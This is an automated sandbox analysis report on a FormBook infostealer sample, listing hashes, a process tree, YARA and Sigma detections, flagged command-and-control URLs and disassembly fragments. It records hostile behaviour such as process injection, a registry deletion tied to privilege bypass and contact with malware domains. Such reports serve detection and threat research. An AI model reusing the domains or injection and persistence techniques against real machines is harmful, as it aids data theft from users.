Windows Analysis Report Form_TT_EUR57,890.exe

Overview

General Information

Sample Name: Form_TT_EUR57,890.exe
Analysis ID: 458655
MD5: 811ea41e60760a97b5f28973618728fe
SHA1: ec072cb8cb67785ca7fba45d36c6264b7eed65cd
SHA256: e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Form_TT_EUR57,890.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe' MD5: 811EA41E60760A97B5F28973618728FE)
    • logagent.exe (PID: 5784 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Fdhlajk.exe (PID: 6148 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • mshta.exe (PID: 5732 cmdline: C:\Windows\System32\mshta.exe MD5: 7083239CE743FDB68DFC933B7308E80A)
        • Fdhlajk.exe (PID: 6496 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • secinit.exe (PID: 6044 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
        • rundll32.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Windows\SysWOW64\mshta.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • autoconv.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 2408 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
    • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2244 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6200 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\kjalhdF.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0xe98:$file: URL=
  • 0xe7c:$url_explicit: [InternetShortcut]
0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
4.0.logagent.exe.10410000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.0.logagent.exe.10410000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.0.logagent.exe.10410000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
4.2.logagent.exe.10410000.5.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.logagent.exe.10410000.5.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, NewProcessName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, OriginalFileName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , ProcessId: 6148
Sigma detected: Suspicious Process Start Without DLL
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 | Avira URL Cloud: Label: malware
Source: http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 | Avira URL Cloud: Label: malware
Source: http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | ReversingLabs: Detection: 19%
Multi AV Scanner detection for submitted file
Source: Form_TT_EUR57,890.exe | ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match | File source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: 4.0.logagent.exe.10410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.logagent.exe.10410000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.secinit.exe.10410000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.2.mshta.exe.10410000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 26.0.mshta.exe.10410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.0.secinit.exe.10410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Form_TT_EUR57,890.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov edx, dword ptr [eax]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov ebx, dword ptr [ecx]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then xor ecx, ecx
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then or edx, 00000080h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then or edx, 02h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then or edx, 01h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then lea edx, dword ptr [ebp-08h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then test eax, 15000000h
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [004199ECh]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe | Code function: 4x nop then mov eax, dword ptr [ebx]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp-0Ch]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov edx, dword ptr [eax]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov ebx, dword ptr [ecx]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor ecx, ecx
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 00000080h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 80000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 02h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then or edx, 01h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [ebp-04h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then lea edx, dword ptr [ebp-08h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [edi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199DCh]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000004h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199D4h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [esi]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C0h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 00000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199C8h]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then push 004199E0h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then xor eax, eax
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then test eax, 15000000h
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [004199ECh]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe | Code function: 4x nop then mov eax, dword ptr [00419A0Ch]
